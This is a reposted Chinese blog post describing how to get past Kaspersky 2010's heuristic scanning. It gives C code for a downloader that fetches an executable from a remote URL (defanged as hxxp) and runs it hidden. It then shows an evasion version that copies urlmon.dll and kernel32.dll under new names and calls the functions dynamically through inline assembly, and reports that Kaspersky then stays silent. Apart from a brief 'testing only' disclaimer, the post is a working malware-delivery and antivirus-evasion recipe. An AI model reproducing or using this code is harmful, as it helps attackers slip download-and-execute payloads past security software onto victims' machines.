转载自:http://blog.sina.com.cn/s/blog_63a4534c01012ugj.html
卡巴斯基2010有强大的启发式扫描,其实启发式扫描有很多弱点,有一个就是不能完全的模拟程序的运行环境,这就可能给我们留出来了一块空间来绕过启发式扫描,其实其它杀毒软件的启发式扫描都存在这些空间,下面就来分析一下卡巴斯基的启发式扫描吧!
首先要编一段程序来完成测试,程序一定要非常的针对启发式扫描这一块的,不然的话没有效果,选那段代码来测试呢?恩,有段代码启发式扫描几乎都要扫描的,那就是下载者的代码,一般的下载者代码如下:
(为防止误点击,所有网址已设为hxxp,欲尝试请修改后再访问)
int _tmain(int argc, _TCHAR* argv[]) { URLDownloadToFileA(NULL,"hxxp://www.hehe/yan.exe","c:\yan.exe",0,NULL); WinExec("C:\yan.exe",SW_HIDE); }
上面代码应该是最熟悉的了,启发式扫描发现调用URLDownloadToFileA和WinExec就认为是病毒了,先写这么一个程序,放到卡巴斯基2010下
于是,卡巴报下载者病毒,看来卡巴的启发式扫描起作用了,经过测试,无论改成动态调用还是其它方案,只要调用Kennel32.dll中的WinExec和UrlMon.dll中的URLDownloadToFileA都无法躲过卡巴斯基的启发式扫描。
下面开始以启发式扫描的弱点来测试,那就是不能完全模拟程序运行环境的,当我们创建文件等操作时,在启发式扫描的环境中实际是没有操作的,那么方法诞生
了,可以先复制一个Kernel32.dll的副本Kaba.dll,然后动态调用KaBa.dll中的WinExec函数,那么启发式扫描应该作废了,
因为在启发式扫描的环境中根本不会真正的复制一个Kaba.dll文件,那么我们的动态调用就是未知的,所以我们的程序很安全。修改代码如下:
char * Str="c:\yan.exe"; char * Url="hxxp://www.hehe/yan.exe"; CopyFileA("C:\windows\system32\urlmon.dll","c:\windows\system32\KaBaUrl.dll",true); LoadLibrary("KaBaUrl.dll"); PVOID Dwon=GetProcAddress(GetModuleHandle("KaBaUrl.dll"),"URLDownloadToFileA"); _asm { push 0 push 0 push Str push Url push 0 call Dwon } CopyFileA("c:\windows\system32\kernel32.dll","c:\windows\system32\KaBa.dll",true); LoadLibrary("KaBa.dll"); PVOID Fun=GetProcAddress(GetModuleHandle("KaBa.dll"),"WinExec"); _asm { push SW_HIDE push Str call Fun }
上面代码生成的程序运行时,卡巴不会有任何反应,看来启发式扫描还有很大的缺点,最后希望卡巴斯基的启发式扫描越来越完善,到杀毒软件的启发式扫描能完全 模拟程序运行环境时,那么启发式扫描可能就不叫启发式扫描了(声明:上面代码只做测试使用,凡是用于非法用途的,后果自负。)